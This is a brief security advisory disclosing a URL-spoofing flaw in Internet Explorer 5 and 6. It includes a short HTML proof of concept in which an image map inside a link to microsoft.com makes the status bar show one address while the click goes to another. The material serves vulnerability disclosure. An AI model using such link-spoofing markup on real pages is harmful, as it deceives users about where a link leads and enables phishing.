‘Microsoft Internet Explorer ImageMap URL Spoof Vulnerability’

Summary

‘A vulnerability has been found in Microsoft Internet Explorer. A specially coded ImageMap can be used to spoof the URL displayed in the lower, left hand corner of the browser.’

Credit:

‘The information has been provided by Paul Kurczaba.
The original article can be found at: http://www.kurczaba.com/securityadvisories/0405132poc.htm


Details

Affected Systems/Configuration:
The versions affected by this vulnerability are Microsoft Internet Explorer 5 and 6.

An ImageMap can be used to spoof the URL displayed in the lower, left hand of the browser. View the ‘Proof of Concept’ example for details.

Proof of Concept:
http://www.kurczaba.com/securityadvisories/0405132poc.htm

< A HREF=’http://www.microsoft.com/’>
< map name=’FPMap0’>

< area coords=’0, 6, 151, 32′ shape=’rect’ href=’http://www.linux.com’>
</map>
< img SRC=’http://www.kurczaba.com/images/0405132-graphic2.gif’ WIDTH=’156′ HEIGHT=’38’ border=’0′ usemap=’#FPMap0’></A>
</a>’

Categories: Windows